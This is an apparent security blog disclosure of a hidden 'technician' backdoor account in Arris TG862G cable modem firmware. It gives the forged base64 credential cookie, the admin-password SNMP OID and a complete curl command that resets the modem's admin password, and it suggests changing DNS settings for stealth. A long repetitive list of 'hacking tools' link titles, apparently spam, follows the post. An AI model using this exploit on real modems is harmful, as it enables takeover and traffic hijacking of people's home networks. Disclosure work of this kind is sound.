Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -

Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.

Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):

Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9

 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:

{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

And after base64 decoding the "credential" value we get:

{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:

Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9

Which decodes to the following:

{"credential":"dGVjaG5pY2lhbjo="}

And finally:

{"credential":"technician:"} 

Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(

That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:

That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:

Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:

SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);

Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:

HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}

What about setting a new value? Surely that will not work....

That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:

This functionality can be wrapped up in the following curl command:

curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'

Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


Related news

1. Wifi Hacker Tools For Windows
2. Hack Tool Apk No Root
3. Pentest Tools Alternative
4. Hacking Tools And Software
5. Hacking App
6. Hacker Tools Free Download
7. What Is Hacking Tools
8. Hacker Tools 2019
9. Hack Tools For Windows
10. Tools For Hacker
11. Hacking Tools And Software
12. Pentest Tools Review
13. Termux Hacking Tools 2019
14. Pentest Tools For Android
15. Pentest Tools For Ubuntu
16. Pentest Tools List
17. Hacker Security Tools
18. Hacking Tools For Games
19. Hacker Tools
20. Hacker Tools For Mac
21. Pentest Tools Github
22. Hacker Tools For Pc
23. Hacker Tools Apk Download
24. Hack Tools Github
25. Pentest Tools Github
26. Pentest Tools Bluekeep
27. Hacking Tools For Windows 7
28. Hacking Tools For Beginners
29. Pentest Tools Windows
30. Hacker Tools Linux
31. Hacking Tools For Pc
32. Hack Tools 2019
33. How To Install Pentest Tools In Ubuntu
34. Hacker Tools List
35. Hack Tools Online
36. Termux Hacking Tools 2019
37. Pentest Tools Github
38. Pentest Tools Github
39. Pentest Tools Alternative
40. Top Pentest Tools
41. Github Hacking Tools
42. Pentest Tools Open Source
43. Hacker Tools Windows
44. Easy Hack Tools
45. Hacking Tools Pc
46. Pentest Tools Review
47. Pentest Tools Online
48. New Hack Tools
49. Hacker Tools Free
50. Hacker Tools Online
51. Pentest Tools Android
52. Hacker Tools For Windows
53. Hacker Tools Free Download
54. Hacker Tools For Pc
55. Pentest Tools Free
56. Tools For Hacker
57. Hacker Hardware Tools
58. Hack Website Online Tool
59. Hack Tools Pc
60. Pentest Tools For Windows
61. Pentest Tools Free
62. Hack Tools For Games
63. How To Install Pentest Tools In Ubuntu
64. Hacking Tools For Windows Free Download
65. Hack Tools Download
66. Hack Tools Mac
67. Hacking Tools 2020
68. Black Hat Hacker Tools
69. Hacking Tools Name
70. Hacking Tools For Windows
71. Install Pentest Tools Ubuntu
72. Pentest Tools Linux
73. Easy Hack Tools
74. Hacking Tools For Mac
75. Pentest Tools For Android
76. Hacker
77. Pentest Tools Open Source
78. Nsa Hack Tools
79. Pentest Tools Framework
80. Hacker
81. Hacking Tools 2020
82. Hacking Tools Pc
83. Hack Tools For Games
84. Tools Used For Hacking
85. Hacker Tools Github
86. Hacking Tools Download
87. Hack Website Online Tool
88. Hack And Tools
89. Easy Hack Tools
90. Hacker Tools List
91. Hacking Tools Hardware
92. Hack Tools For Windows
93. Beginner Hacker Tools
94. Hacking Tools For Pc
95. Underground Hacker Sites
96. Hack Tools Mac
97. Pentest Tools Tcp Port Scanner
98. Hacker Tools Github
99. Hacker Tools Github
100. Pentest Tools Windows
101. Pentest Tools Open Source
102. Hacker Tools 2019
103. Hackrf Tools
104. Hacker Tools Online
105. Hacker Tools Apk Download
106. Pentest Box Tools Download
107. Hacking Tools And Software
108. Pentest Tools For Windows
109. What Are Hacking Tools
110. Hacker Tools Linux
111. Pentest Tools Port Scanner
112. Hacking App
113. Hacking Tools For Mac
114. Hacking Tools Free Download
115. Hacker Tools Mac
116. Hacker Tools Apk
117. Hacking Tools 2019
118. Pentest Tools Download